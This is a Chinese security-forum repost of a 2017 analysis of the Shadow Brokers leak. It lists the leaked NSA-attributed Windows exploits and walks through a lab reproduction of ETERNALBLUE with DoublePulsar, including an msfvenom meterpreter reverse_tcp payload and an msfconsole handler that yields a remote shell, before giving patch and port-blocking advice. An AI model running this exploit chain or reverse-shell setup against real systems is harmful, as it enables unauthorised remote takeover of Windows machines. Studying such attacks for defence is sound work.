用户
搜索
  • TA的每日心情
    开心
    2016-9-7 09:25
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    SRC部落

    Rank: 7Rank: 7Rank: 7

    17

    主题

    60

    帖子

    2107

    魔法币
    收听
    1
    粉丝
    3
    注册时间
    2016-8-31

    i春秋认证SRC部落

    发表于 2017-4-18 10:13:35 433313
    早在2016年,黑客组织 Shadow Brokers声称攻破了为NSA开发网络武器的美国黑客团队Equation Group,并公开拍卖据称为美国政府使用的黑客工具。

    为了证明自己的说法,Shadow Brokers贴出似乎为针对路由器安全软件的攻击代码。该组织表示,如果得到100万比特币(现价约合5.68亿美元),将公开这些工具(它的比特币地址目前只有0.12 BTC)。

    网络安全专家怀疑该组织是否获得了其所宣称的黑客工具,不过几位专家称,该组织所公布的代码看起来像是真的。该事件对五家路由器制造商造成影响,即三家美国公司──思科、瞻博网络(Juniper)、Fortinet和两家中国公司── 西网云信息技术有限公司、北京天融信网络安全技术有限公司

    北京时间2017年4月14日夜间,该组织在多次出售无果的情况下再次放出EQGRP_Lost_in_Translation文件,该文件包括多个Windows 0day,0day多为远程利用,评级为严重,可以覆盖大部分windows服务器

    历史回溯2016年8月

    释放“eqgrp-free-file.tar.xz.gpg“和”eqgrp-auction-file.tar.xz.gpg“两个文件,其中提供了第一个a文件的密码
    2017年4月9日
    “eqgrp-auction-file.tar.xz.gpg”文件解开密码
    2017年4月14日
    再次释放“EQGRP_Lost_in_Translation”文件

    事件分析这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具(我们挑几个重要的列举如下):
    1、EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具。

    2、ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。

    3、除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。

    4、ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口且开启了智能卡登陆的 Windows XP 和 Windows 2003 机器。

    5、FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。

    6、ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。

    7、ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。

    8、ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。

    复现过程环境搭建

    注意,必须按照python2.6相关版本,其他版本不奏效。
    下载python2.6并安装
    下载pywin32并安装
    将C:\Python26添加到环境变量PATH中。


    配置环境
    将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉。





    实验环境

    攻击机1:192.168.71.133,winserver 2008,32bit


    攻击机2:192.168.71.130 kali2



    靶机:192.168.199.107,win7 64bit




    利用步骤

    在靶机1(192.168.71.133)中安装好python、pywin32以及NSA工具,在C:\shadowbroker-master\windows 中执行fb.py:

    分别设置攻击IP地址192.168.199.107,回调地址192.168.71.133(攻击机1),关闭重定向,设置日志路径,新建或选择一个project:

    接下来输入命令:
    useETERNALBLUE
    依次填入相关参数,超时时间等默认参数可以直接回车:

    由于靶机是win7 系统,在目标系统信息处选择1:win72k8r2

    模式选1:FB

    确认信息,执行


    成功后,接着运行use Doublepulsar:

    并依次填入参数,注意在function处选择2,rundll

    同时在攻击机2 kali的msfVENOM 生成攻击dll:
    msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

    接着执行:
    $ msfconsole
    msf > useexploit/multi/handler
    msf > set LHOST192.168.71.130
    msf > set LPORT 5555
    msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp
    msf > exploit


    同时将生成的go.dll上传到攻击机1(192.168.71.133),回到攻击机1,填入攻击dll路径:


    接下来一路回车,执行攻击

    回到kali,获得shell,攻击成功:


    修复方案1.临时规避措施:关闭135、137、139、445,3389端口开放到外网。推荐使用安全组策略禁止135.137.139.445端口;3389端口限制只允许特定IP访问。

    2.及时到微软官网下载补丁升级,微软官方公告连接:https://blogs.technet.microsoft. ... nd-evaluating-risk/
    微软已经发出通告 ,强烈建议用户更新最新补丁:

    MS17-010 : 严重 - Microsoft Windows SMB 服务器安全更新 (4013389)
    https://technet.microsoft.com/zh ... urity/ms17-010.aspx
    MS14-068 :严重 - Kerberos 漏洞可能允许特权提升 (3011780)
    https://technet.microsoft.com/library/security/MS14-068
    MS10-061:严重 - 打印后台程序服务中的漏洞可能允许远程执行代码
    https://technet.microsoft.com/library/security/ms10-061
    MS09-050 :严重 - SMBv2 中的漏洞可能允许远程执行代码 (975517)
    https://technet.microsoft.com/library/security/ms09-050
    MS08-067 :严重 - 服务器服务中的漏洞可能允许远程执行代码 (958644)
    https://technet.microsoft.com/library/security/ms08-067

    原文阅读【高危预警】Shadow broker泄露机密文件始末及技术分析



    *关注安全狗微信公众号,阅读更多精彩文章!*

    沙发
    使用道具 举报 回复
    发表于 2017-4-18 17:57:07
    真心很详细
    使用道具 举报 回复
    虚拟机试了试,连接直接中断,第二次不能成功了
    使用道具 举报 回复
    发表于 2017-4-19 12:59:06
    好详细
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册